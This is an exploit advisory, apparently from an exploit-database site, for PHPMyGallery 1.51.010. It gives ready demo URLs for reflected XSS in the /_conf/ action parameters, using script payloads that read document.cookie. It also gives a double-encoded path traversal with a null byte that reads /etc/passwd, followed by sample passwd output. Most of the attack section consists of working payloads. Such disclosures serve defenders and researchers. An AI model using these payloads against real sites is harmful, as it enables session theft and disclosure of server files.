PHPMyGallery 1.51.010 XSS & Local File Disclosure

2013.02.22

Credit: TheMirkin

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: CWE-79
CWE-98

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Phpmygallery -Multiple Vulnerabilities All Version
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit : Phpmygallery -Multiple Vulnerabilities All Version
./WebApps URL :http://phpmygallery.kapierich.net
./WebApps Download :http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.51.010.zip
./Scripts Version : 1.51.010 & All version
./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com ] [ All Janissaries ]
./Security Risk : [ High Level ]
./Category XPL : [ WebApps]
./Date : 21.02.2013.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#################################################################################
#_____________________________________________________#
#[~] Xss on
# /_conf/?action=statistics&filename=[Code]
# /_conf/?action=delsettings&group=[Code]
# _conf/?action=mainsetup&group=&picdir=[Code]
###Demo Exploit
# http://www.target.com/_conf/?action=statistics&filename=2011.10"><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee>
# http://www.target.com/_conf/?action=delsettings&group="><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee>
#
#_____________________________________________________#
#[~] Path Vulnerabilities ON
# /_conf/?action=delsettings&group=[Code]%2500.jpg&picdir=Sample_Gallery&what=descriptions
#
####Demo Exploit
# http://www.target.com/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&picdir=Sample_Gallery&what=descriptions
#_____________________________________________________
# #
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
#_____________________________________________________#
# xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx #
# Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
#################################################################################

References:

http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.51.010.zip

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PHPMyGallery 1.51.010 XSS & Local File Disclosure

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.